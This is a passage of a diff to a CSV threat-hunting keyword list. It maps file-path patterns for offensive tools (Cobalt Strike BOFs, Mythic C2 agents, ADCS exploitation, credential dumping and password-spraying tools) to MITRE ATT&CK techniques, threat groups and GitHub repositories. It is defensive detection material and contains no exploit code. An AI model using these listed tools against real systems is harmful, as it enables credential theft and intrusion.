Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*/adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*/ADCSPwn.git*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*/add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/add_groupmember.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AddUser-Bof.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/AddUser-Bof/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*/ADHunt.git*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*/ad-ldap-enum.git*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*/adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/Admin2Sys.git*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" -"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1514","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" -"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1515","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" +"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*/aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2618,22 +2621,22 @@ "*/agent/C/src/*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/agent/stagers/dropbox.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/agent_code/Apollo/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/agent_code/cmd_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 